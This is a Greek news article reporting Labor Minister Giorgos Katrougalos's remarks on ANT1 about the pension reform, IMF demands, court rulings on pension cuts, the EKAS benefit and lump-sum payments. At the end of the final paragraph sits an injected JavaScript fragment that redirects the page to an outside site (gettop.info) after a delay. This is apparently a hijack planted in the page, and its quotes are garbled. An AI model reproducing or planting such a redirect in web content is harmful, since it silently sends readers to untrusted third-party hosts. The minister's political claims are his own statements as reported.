Κατρούγκαλος: Η ασφαλιστική μεταρρύθμιση είχε μόνο καλές συνέπειες

0
8

 

«Εμείς στήσαμε στα πόδια του το Ασφαλιστικό. Η ασφαλιστική μεταρρύθμιση είχε μόνο καλές συνέπειες, δεν είχε καμιά οριζόντια μείωση των συντάξεων, στηρίχθηκε σε ένα εντελώς νέο σύστημα, με κανόνες ισονομίας για όλους, στο πλαίσιο του οποίου επανϋπολόγισε και τις παλιές συντάξεις», είπε μιλώντας στον ΑΝΤ1, ο υπουργός Εργασίας.

Ο Γιώργος Κατρούγκαλος σημείωσε ότι η αύξηση των εισφορών αποφασίστηκε για να μην υπάρξει μείωση συντάξεων, ενώ είπε ότι το μεγάλο πρόβλημα των Ταμείων είναι τα ελλείμματα.

«Όσο είμαστε εμείς κυβέρνηση, δεν πρόκειται να καταργηθεί η προσωπική διαφορά στις συντάξεις», υπογράμμισε ο Γιώργος Κατρούγκαλος, λέγοντας ότι το ΔΝΤ ζητά να καταργηθούν πολλά πράγματα, ενώ σε ό,τι αφορά τις μειώσεις στις επικουρικές συντάξεις είπε «”ψαλιδίστηκαν” μόνο για 220.000 συνταξιούχους, αλλά “τι να κάνουμε”», προσθέτοντας πάντως ότι δεν αφορά το σύνολο των συνταξιούχων, όπως αναφερόταν.

Δεν δώσαμε «αίμα», όπως ζητούσε το ΔΝΤ

«Το ΔΝΤ ζήτησε «αίμα», εμείς δεν δώσαμε «αίμα». Το ασφαλιστικό είναι κομμάτι της α΄ αξιολόγησης κι έχει κλείσει οριστικά. Δεν ξανανοίγει το Ασφαλιστικό. Εμείς αν αλλάξουμε κάτι, είναι να παγώσουμε τις οφειλές και να επιτρέψουμε στους ελεύθερους επαγγελματίες και να επιτρέψουμε επαγγελματικά ταμεία, αυτό όμως δεν είναι κάτι που έχει αποφασιστεί», επεσήμανε ο υπουργός Εργασίας.

Οι μειώσεις στις συντάξεις

Ο Υπουργός Εργασίας δήλωσε «περήφανος για την εθνική σύνταξη, την οποία καθιερώσαμε, ενώ σε όλη την Ευρώπη η πορεία ήταν αντίθετη», ενώ αναφερόμενος στις αποφάσεις του ΣτΕ με τις οποίες κρίθηκαν ως αντισυνταγματικές τις περικοπές στις συντάξεις από το 2012 και εξής, ο Υπουργός Εργασίας είπε ότι στηρίχθηκε στην άποψη πως υπήρχαν οριζόντιες περικοπές.

Υποστήριξε ωστόσο ότι δεν όριζε το δικαστήριο την επιστροφή των χρημάτων στους δικαιούχους (!), σημειώνοντας ότι με τις δικές του ενέργειες «προστατεύτηκαν» οι συντάξεις ως τα 1.300 ευρώ (άθροισμα κύριων κι επικουρικών συντάξεων).

Δεν θέλαμε να κοπεί το ΕΚΑΣ

Σε ό,τι αφορά την περικοπή του ΕΚΑΣ, ο κ. Κατρούγκαλος είπε ότι η κυβέρνηση «το θυσίασε» για να μην χρεοκοπήσει η χώρα, λέγοντας χαρακτηριστικά «πριν από τον Ιανουάριο του 2015, όταν πιστεύαμε ότι η διαπραγμάτευση θα πήγαινε καλύτερα, πράγματι είχαμε υποσχεθεί επαναφορά του ΕΚΑΣ, όμως δεν ίσχυε κάτι τέτοιο πριν τις εκλογές του Σεπτεμβρίου του 2015, καθώς είχε ψηφιστεί η κατάργηση του, στο πλαίσιο του επώδυνου συμβιβασμού, για να μην πάει η χώρα στην άτακτη χρεοκοπία».

Για τα εφάπαξ

Απαντώντας στις επικρίσεις της ΝΔ ότι επί ΣΥΡΙΖΑ δεν έχει πληρωθεί κανένα εφάπαξ κι ότι η δόση από τους δανειστές για τα ληξιπρόθεσμα χρέη του Δημοσίου δεν μπορεί να αξιοποιηθεί για την καταβολή εφάπαξ, ο υπουργός Εργασίας υποστήριξε ότι «από το 2013 δεν είχε πληρωθεί κανένα εφάπαξ. Εμείς έχουμε δώσει ως τώρα 200 εκατ. ευρώ και μέχρι τέλος του έτους θα δοθούν άλλα 50 εκατ. ευρώ». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here